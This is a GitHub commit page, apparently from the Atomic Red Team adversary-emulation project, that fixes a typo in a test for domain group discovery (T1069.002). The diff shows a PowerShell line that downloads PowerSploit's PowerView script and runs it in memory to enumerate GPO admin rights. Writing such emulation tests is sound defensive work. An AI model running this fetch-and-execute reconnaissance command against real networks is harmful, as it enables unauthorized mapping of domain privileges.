Skip to content

Commit

Permalink
T1069.002 test #6 - fix typo in command (#2613)
Browse files Browse the repository at this point in the history
* T1069.002 test #6 - fix typo in command

* T1069.002 Test #6 fix typo in command
  • Loading branch information
kdebscwx authored Nov 22, 2023
1 parent 88d1fbb commit 55b75a5
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion atomics/T1069.002/T1069.002.md
Original file line number Diff line number Diff line change
Expand Up @@ -218,7 +218,7 @@ takes a computer and determines who has admin rights over it through GPO enumera

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
```


Expand Down
2 changes: 1 addition & 1 deletion atomics/T1069.002/T1069.002.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -81,7 +81,7 @@ atomic_tests:
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
name: powershell
- name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
Expand Down

0 comments on commit 55b75a5

Please sign in to comment.